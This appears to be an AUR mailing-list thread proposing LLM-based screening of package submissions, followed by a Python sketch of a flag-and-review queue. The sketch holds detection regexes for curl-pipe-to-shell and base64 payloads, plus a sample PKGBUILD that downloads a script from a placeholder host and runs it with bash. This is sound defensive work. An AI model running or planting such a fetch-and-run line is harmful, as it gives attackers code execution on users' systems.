Greetings,

I believe it has to be a language model, as those would be the only ones capable of the reasoning needed to trace more complex code paths.
We should test out some open-weight ones to see how they would fare against malicious vs innocent AUR packages and calculate what the costs of hosting them would be.

Best regards,
--
Borna Punda

-------- Original Message --------
From: [email protected]
Sent: 29 May 2026 09:56:53 GMT+02:00
To: Shyamin Ayesh <[email protected]>
Cc: "Discussion about the Arch User Repository (AUR)" <[email protected]>
Subject: Re: [Idea] AUR vetting process using LLM models

Pretty good idea you got there, however there's a legitimate concern on where and how you are going to be running it. For instance, which model to use? Gemini? Deepseek? Open-sourced ChatGPT?

Secondly, where are we gonna get the money for that? Donations are enough for everything up to this point, but running an LLM will shoot costs through the roof.

I suggest either distilling or training a separate algorithm (**NOT** a language model) to keep costs low, as it won't be a generalist and we won't be wasting RAM on storing parameters about medicine in a software project.

-------- Original Message --------
On Friday, 05/29/26 at 11:23 Shyamin Ayesh <[email protected]> wrote:

> Hello Everyone,
>
> I know this is going to be a controversial idea, and I'm not much of a
> writer, so bear with me here.
>
> I've been noticing the recent wave of spam packages and malicious code
> submissions hitting the AUR lately. It's getting worse, and the current
> manual review process clearly doesn't scale.
>
> So here's my possibly unpopular suggestion: what if we used LLMs as a
> first-pass filter for AUR submissions?
>
> The basic idea:
> - When a PKGBUILD or install script gets submitted, an LLM scans it for
>   sketchy stuff like obfuscated code, curl pipes to random endpoints, crypto
>   miners, encoded payloads, that kind of thing.
> - It doesn't replace human review. It just flags the suspicious ones so
>   reviewers know where to look first.
> - Unlike regex-based scanners, LLMs can actually understand code intent. They
>   can catch things like subtle dependency hijacking or weird post-install
>   behavior that static tools would miss.
> - Flagged packages go into a queue with the LLM's reasoning attached, not
>   just "blocked" but why it thinks something is off.
>
> I get it, there are real concerns. False positives, inference costs, and
> honestly just the idea of putting AI anywhere near the trust pipeline. But
> I'm not saying replace anything. Just add a layer. Could be a server-side
> hook on submission, or a community bot that comments on new packages. I'm
> happy to help build a prototype if anyone's interested.
>
> I know some of you are going to hate this idea, and that's fine. But the spam
> problem is real and getting worse, so I figured it's worth putting out there.
> Open to better ideas too.
>
> Cheers,
> Shyamin
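
For anyone who wants something concrete to poke at, here is a rough sketch of the flag-and-queue flow described in the original proposal: a submission goes through a first-pass reviewer, and anything suspicious lands in a queue with the reasons attached. Everything in it is an assumption made for illustration. The names `Flag`, `first_pass`, `heuristic_reviewer`, and `review_queue` are hypothetical, and the reviewer shown is a plain regex stand-in, not an LLM. A model-backed reviewer would plug in as another function with the same signature.

```python
import re
from dataclasses import dataclass, field
from typing import Callable, List, Optional

# Illustrative patterns for two of the categories named in the proposal.
# This is NOT a vetted rule set; it only exists to exercise the queue flow.
SUSPICIOUS_PATTERNS = {
    "curl/wget piped to a shell": re.compile(
        r"\b(curl|wget)\b[^\n|]*\|\s*(sudo\s+)?(ba|z)?sh\b"
    ),
    "base64-decoded payload": re.compile(r"base64\s+(-d|--decode)\b"),
}


@dataclass
class Flag:
    """A flagged package together with the reasons it was flagged."""
    package: str
    reasons: List[str] = field(default_factory=list)


# A reviewer takes PKGBUILD text and returns human-readable reasons.
# An LLM-backed reviewer (hypothetical) would share this signature.
Reviewer = Callable[[str], List[str]]


def heuristic_reviewer(pkgbuild: str) -> List[str]:
    """Stand-in for the model call: simple regex checks, not an LLM."""
    return [
        label
        for label, pattern in SUSPICIOUS_PATTERNS.items()
        if pattern.search(pkgbuild)
    ]


def first_pass(
    package: str, pkgbuild: str, reviewer: Reviewer = heuristic_reviewer
) -> Optional[Flag]:
    """Return a Flag with reasons attached, or None if nothing looked off."""
    reasons = reviewer(pkgbuild)
    return Flag(package, reasons) if reasons else None


# Made-up sample submissions; the package names and URL are placeholders.
samples = {
    "hello": 'pkgname=hello\nbuild() { make; }\n',
    "evil-pkg": 'pkgname=evil-pkg\n'
                'build() { curl -s https://example.invalid/x.sh | bash; }\n',
}

# Flagged packages are queued for human review; nothing is blocked here.
review_queue: List[Flag] = []
for name, text in samples.items():
    flag = first_pass(name, text)
    if flag is not None:
        review_queue.append(flag)

for flag in review_queue:
    print(f"{flag.package}: {'; '.join(flag.reasons)}")
```

Keeping the reviewer as a swappable function means the same queue could be tested with a cheap heuristic, a distilled classifier, or an open-weight model, which makes the cost and accuracy comparison raised in this thread easier to run.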
